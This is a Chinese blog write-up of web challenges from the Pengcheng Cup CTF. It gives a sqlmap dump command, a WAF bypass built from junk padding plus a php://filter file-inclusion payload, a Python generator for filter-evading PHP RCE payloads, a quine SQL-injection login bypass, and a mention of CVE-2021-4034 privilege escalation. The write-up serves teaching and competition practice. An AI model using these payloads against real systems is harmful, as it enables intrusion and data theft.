鹏城杯--web赛题 WP
比完了才想起来写一篇文章orz
Easygo
直接用sqlmap就可以跑出flag
python sqlmap.py -u http://xxx.xxx --dump
简单包含
打开就遇到一个防火墙,看图片像是创宇的防火墙
经过一系列尝试最后通过垃圾数据绕过
payload大概是这样
a=................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................&a=php://filter/read=convert.base64-encode/resource=flag.php
然后将回显的base64编码内容拿去解码
简单的php400
打开题目
对code参数进行了一大堆过滤,提示是二维数组,但是构造了半天没解出来
当时就猜到,可能异或也能做出来
后悔没早点学异或Rce(书到用时方恨少QAQ
结束后看了大佬的脚本
def one(s):
ss = ""
for each in s:
ss += "%" + str(hex(255 - ord(each)))[2:].upper()
return f"[~{ss}][!%FF]("
while 1:
a = input(":>").strip(")")
aa = a.split("(")
s = ""
for each in aa[:-1]:
s += one(each)
s += ")" * (len(aa) - 1) + ";"
print(s)
利用脚本构造的异或pyload即可直接绕过过滤
can_u_login350
不会做。参考其他文章说是quine注入、
pyload是
password='//union//select//replace(replace('"//union//select//replace(replace("%",0x22,0x27),0x25,"%")%23',0x22,0x27),0x25,'"//union//select/**/replace(replace("%",0x22,0x27),0x25,"%")%23')%23
高手高手高手
不会。貌似是用的CVE-2018-17552
https://cn.0day.today/exploit/31277
比赛结束后看其他大佬的wp说通过访问package.zip拿到源码后通过msf来getshell,然后用CVE-2021-4034来提权即可拿到flag
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步